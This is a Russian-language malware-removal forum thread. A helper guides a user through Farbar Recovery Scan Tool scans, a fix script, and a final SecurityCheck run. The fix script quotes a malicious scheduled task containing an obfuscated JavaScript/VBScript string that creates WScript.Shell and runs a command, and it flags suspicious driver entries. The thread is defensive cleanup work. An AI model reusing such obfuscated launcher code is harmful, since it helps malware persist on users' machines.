Перейти к содержанию

Рекомендуемые сообщения

Здравствуйте!

 

Дополнительно, пожалуйста:

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Ссылка на комментарий
Поделиться на другие сайты

Примите к сведению - после выполнения скрипта (возможно) все открытые вкладки браузеров будут закрыты, произойдет выход из аккаунтов, временные файлы, корзина, история браузеров, куки и кэш будут очищены.

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Start::
    CloseProcesses:
    SystemRestore: On
    CreateRestorePoint:
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ConsoleTesting2016(v.1) — ярлык.lnk [2022-11-06]
    ShortcutTarget: ConsoleTesting2016(v.1) — ярлык.lnk -> C:\Windows\Branding\BenchMarkGSB\ConsoleTesting2016(v.1).exe (Нет файла)
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HWiNFO64 — ярлык.lnk [2022-11-06]
    ShortcutTarget: HWiNFO64 — ярлык.lnk -> C:\Windows\Branding\BenchMarkGSB\HWiNFO64.exe (Нет файла)
    Task: {5AB57EC3-A231-4F10-BF1D-E3A5C8A4398E} - System32\Tasks\$sxr-jHwFrjowLDztNScXPPPT => %$sxr-jHwFrjowLDztNScXPPPT4321%  "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x (запись имеет ещё 193 символов). (Нет файла)
    S3 ALSysIO; \??\C:\Users\836D~1\AppData\Local\Temp\ALSysIO64.sys [X] <==== ВНИМАНИЕ
    S3 GPU-Z-v2; \??\C:\Users\836D~1\AppData\Local\Temp\GPU-Z-v2.sys [X] <==== ВНИМАНИЕ
    S3 HWiNFO_160; \??\C:\Users\836D~1\AppData\Local\Temp\HWiNFO64A_160.SYS [X] <==== ВНИМАНИЕ
    S3 HWiNFO_173; \??\C:\Users\836D~1\AppData\Local\Temp\HWiNFO64A_173.SYS [X] <==== ВНИМАНИЕ
    Zip: c:\FRST\Quarantine\
    EmptyTemp:
    Reboot:
    End::

     

  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.


Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

 

На рабочем столе появится архив Date_Time.zip (Дата_Время)
Отправьте его на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

Ссылка на комментарий
Поделиться на другие сайты

  • 2 недели спустя...

Да, скачал, спасибо!

В завершение, пожалуйста:

1.

Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
Компьютер перезагрузится.

Остальные утилиты лечения и папки можно просто удалить.
 

2.

  • Загрузите SecurityCheck by glax24 & Severnyj, сохраните утилиту на Рабочем столе и извлеките из архива.
  • Запустите из меню по щелчку правой кнопки мыши Запустить от имени администратора
  • Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу
  • Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt
  • Прикрепите этот файл к своему следующему сообщению.

Ссылка на комментарий
Поделиться на другие сайты

  • 2 недели спустя...

По возможности обновите:

Total Commander 64-bit (Remove or Repair) v.10.52 Внимание! Скачать обновления
 

Читайте Рекомендации после удаления вредоносного ПО

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • KitKat
      Автор KitKat
      CollectionLog-2025.06.29-18.57.zip
      Снова и снова возвращается вирус MEM:Trojan.Win32.SEPEH.gen . При работе с одной программой антивирус Касперский начинает сигнализировать об активности вируса. Удаляет. Некоторое время тихо, Потом опять возвращается. С середины мая воюю. Утилита доктора Вэба вообще ничего не находит. 
    • Шавкат Аблазов
      Автор Шавкат Аблазов
      Уже несколько месяцев,раз,а то и несколько раз в неделю касперский находит данный троян MEM:Trojan.Win32.SEPEH.gen,после каждого лечения через некоторое время  снова возникает он при проверке,т.е никак не удаляется,прошу помочь
      CollectionLog-2025.05.23-23.11.zip
    • Чилипиздрик
      Автор Чилипиздрик
      Здравствуйте! Подцепила на просторах интернета указанный MEM:Trojan.Win32.SEPEH.gen Удалить с помощью не выходит KVRT. Он его видит предлагает вылечить или пропустить (варианта удалить нет). Дальше делает вид, что работает, а после перезагрузки компа все остается на своих местах. Подскажите, пожалуйста, что с ним делать.
      CollectionLog-2025.06.18-20.38.zip
    • Kapibara
      Автор Kapibara
      Здравствуйте! Сегодня обнаружил сработку c помощью KES 12.5. Объект lsass.exe. При нажатии "Устранить" ничего не происходит, лишь меняется время сработки. Полагаю, где-то есть .exe, который перезапускает этот процесс, но не нашел его. Файл образа автозапуска из Uvs прилагаю.

      2025-04-11_16-52-36_v4.99.12v x64.7z
    • belodrol
×
×
  • Создать...